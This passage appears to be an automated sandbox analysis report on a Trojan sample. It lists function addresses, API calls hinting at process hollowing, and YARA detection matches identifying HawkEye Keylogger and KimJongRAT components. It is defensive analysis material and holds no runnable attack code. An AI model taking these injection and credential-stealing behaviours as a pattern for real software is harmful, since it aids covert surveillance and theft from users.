Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E330 5_2_04B5E330
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57F10 5_2_04B57F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B538B7 5_2_04B538B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B508B0 5_2_04B508B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55890 5_2_04B55890
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55880 5_2_04B55880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5388B 5_2_04B5388B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E8E2 5_2_04B5E8E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DCD8 5_2_04B5DCD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58439 5_2_04B58439
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B50816 5_2_04B50816
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53C00 5_2_04B53C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E86E 5_2_04B5E86E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53868 5_2_04B53868
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B545B1 5_2_04B545B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54DB0 5_2_04B54DB0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54DA1 5_2_04B54DA1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53580 5_2_04B53580
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53DF2 5_2_04B53DF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B541D8 5_2_04B541D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B539DA 5_2_04B539DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B545C0 5_2_04B545C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B541C9 5_2_04B541C9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B56D30 5_2_04B56D30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5390D 5_2_04B5390D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57508 5_2_04B57508
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D941 5_2_04B5D941
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53AB4 5_2_04B53AB4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D6A0 5_2_04B5D6A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5369C 5_2_04B5369C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CA89 5_2_04B5CA89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53AF4 5_2_04B53AF4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57EC1 5_2_04B57EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CACD 5_2_04B5CACD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DE37 5_2_04B5DE37
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53A3A 5_2_04B53A3A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57A20 5_2_04B57A20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B56A22 5_2_04B56A22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53218 5_2_04B53218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5361B 5_2_04B5361B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53E00 5_2_04B53E00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53A77 5_2_04B53A77
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53671 5_2_04B53671
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CA46 5_2_04B5CA46
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B537B8 5_2_04B537B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53B85 5_2_04B53B85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58B80 5_2_04B58B80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53389 5_2_04B53389
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D3F8 5_2_04B5D3F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B537FA 5_2_04B537FA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D3E8 5_2_04B5D3E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52730 5_2_04B52730
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52721 5_2_04B52721
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53711 5_2_04B53711
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DF0C 5_2_04B5DF0C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53B0F 5_2_04B53B0F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53777 5_2_04B53777
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55768 5_2_04B55768
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53744 5_2_04B53744
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0044900F 6_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004042EB 6_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00414281 6_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00410291 6_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004063BB 6_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00415624 6_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0041668D 6_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040477F 6_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040487C 6_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043589B 6_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043BA9D 6_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043FBD3 6_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0044900F 9_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_004042EB 9_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00414281 9_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00410291 9_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_004063BB 9_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00415624 9_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0041668D 9_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040477F 9_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040487C 9_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043589B 9_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043BA9D 9_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043FBD3 9_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0044900F 18_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_004042EB 18_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00414281 18_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00410291 18_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_004063BB 18_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00415624 18_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0041668D 18_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040477F 18_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040487C 18_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043589B 18_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043BA9D 18_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043FBD3 18_2_0043FBD3
PE file contains strange resources
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: security.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044465C appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044466E appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0041557C appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00416398 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00415F19 appears 102 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044468C appears 108 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00444B90 appears 108 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0041607A appears 198 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0042F6EF appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004162C2 appears 261 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004083D6 appears 96 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5ACC8 NtUnmapViewOfSection,NtUnmapViewOfSection, 5_2_04B5ACC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 9_2_0040978A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 18_2_0040978A
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.936349968.0000000003881000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933537560.0000000000CFA000.00000004.00000001.sdmp Binary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild] vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
